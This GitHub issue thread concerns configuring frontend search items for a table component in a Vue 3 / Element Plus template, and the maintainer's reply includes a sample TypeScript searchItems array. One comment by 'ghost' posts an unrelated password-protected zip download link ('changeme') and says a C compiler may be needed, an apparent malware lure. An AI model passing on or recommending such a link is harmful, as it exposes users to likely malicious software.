### ISSUE TITLE
search前端配置

### ISSUE THREAD

**Issue by YangYue2022** [wjw-gavin/vue3-vite-ts-element-plus#2]
请问如果我想在前端配置搜索项 我要怎么修改 /src/components/Table/index.vue 使其不通过后端获取search参数

**Comment by ghost** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme

you may need to install the c compiler

**Comment by wjw-gavin** [comment]
按数据格式正常传入数据就行，比如在你的列表页定义以下数据传入到 table 组件，在 props 里接收到后传入到 search 组件。
再或者你把 table 中的 search 组件抽离出来，在页面中单独使用都行。
```ts
const searchItems: ISearchItem[] = [
  {
    key: 'id',
    name: 'Popup Name',
    hint: 'Select Name',
    type: 'select',
    options: [],
  },
  {
    key: 'is_open',
    name: 'Status',
    hint: 'Select Status',
    type: 'select',
    options: [
      { label: 'Active', value: 1 },
      { label: 'Inactive', value: 0 },
    ],
  },
]
```
